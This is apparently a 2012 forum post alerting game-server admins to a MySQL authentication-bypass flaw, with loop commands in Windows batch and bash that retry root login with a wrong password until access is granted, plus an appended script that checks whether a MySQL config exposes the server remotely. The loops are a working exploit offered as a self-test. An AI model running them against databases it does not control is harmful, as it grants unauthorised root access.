MySQL Stupid Easy Exploit
Hateborne, 06-12-2012, 02:33 PM

Just throwing this out there, a minor exploit has come up for MySQL.

It affects very few setups from my understanding, but I am still passing this along.

http://isc.sans.edu/diary.html?storyid=13432
http://thehackernews.com/2012/06/cve...ous-mysql.html

Basically, with access to the machine (either locally or remotely), affected versions of MySQL are trivially easy to open up. Supposedly 1/256 chance to get in, which is disgustingly high.


To test for this on Windows, take the three commands below and save them into a bat file:
Code:
:Start
mysql -u root --password=lolwut 2>NUL
goto Start
To test for this on Linux, take ONE of these two and pass it into a terminal:
Code:
for i in `seq 1 1000`; do mysql -u root --password=bad -h 127.0.0.1 2>/dev/null; done
Code:
while true; do mysql -u root --password=bad; done
If any of the tests above bring up the mysql prompt (mysql>), your machine is vulnerable. Patch up or disable all remote access to the database until a patch is made available.

-Hate




EDIT: I understand this is probably against the rules to post such exploits, but seeing as how I do not have an easy way to reach every single server admin(s)...this will have to do. If it's too much info, please copy this and pass it to every EQEMU server admin you can find, then delete the code sections.
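
The mitigation recommended in the post above (disable remote access to the database) can be checked from the server's option file. This is an added example, not part of the original post: the function name `check_mysql_network`, the idea of passing a single option file path, and the sample contents are assumptions; `bind-address` and `skip-networking` are standard MySQL server options.

```shell
#!/bin/sh
# Added example: report whether a MySQL option file keeps mysqld off the network.
# check_mysql_network FILE  (hypothetical helper name)
# Prints one of: skip-networking, loopback-only, remote-exposed
# Returns 0 when remote TCP access is disabled, 1 otherwise.
check_mysql_network() {
    result=$(awk '
        # Only the [mysqld] section configures the server.
        /^[ \t]*\[/ { in_mysqld = ($0 ~ /^[ \t]*\[mysqld\]/); next }
        !in_mysqld { next }
        /^[ \t]*[#;]/ { next }                  # skip comment lines
        {
            line = $0
            sub(/[ \t]*#.*$/, "", line)         # drop trailing comments
            gsub(/[ \t]/, "", line)             # drop whitespace
            n = index(line, "=")
            key = (n ? substr(line, 1, n - 1) : line)
            val = (n ? substr(line, n + 1) : "")
            gsub(/_/, "-", key)                 # option names accept _ or -
            if (key == "skip-networking" && val != "0" && tolower(val) != "off") skipnet = 1
            if (key == "bind-address") bind = val   # last occurrence wins
        }
        END {
            if (skipnet) print "skip-networking"
            else if (bind == "127.0.0.1" || bind == "::1" || bind == "localhost") print "loopback-only"
            else print "remote-exposed"         # assumption: no bind-address means all interfaces
        }' "$1")
    echo "$result"
    [ "$result" != "remote-exposed" ]
}

# Constructed sample option file (not taken from the post).
sample=$(mktemp)
cat > "$sample" <<'EOF'
[client]
port = 3306
[mysqld]
# bind-address = 127.0.0.1
bind-address = 0.0.0.0
EOF
check_mysql_network "$sample" || echo "mysqld accepts remote logins: restrict bind-address or firewall the port"
rm -f "$sample"
```

A `loopback-only` result covers only the remote half of the advice; users with a local account can still reach the server until it is patched.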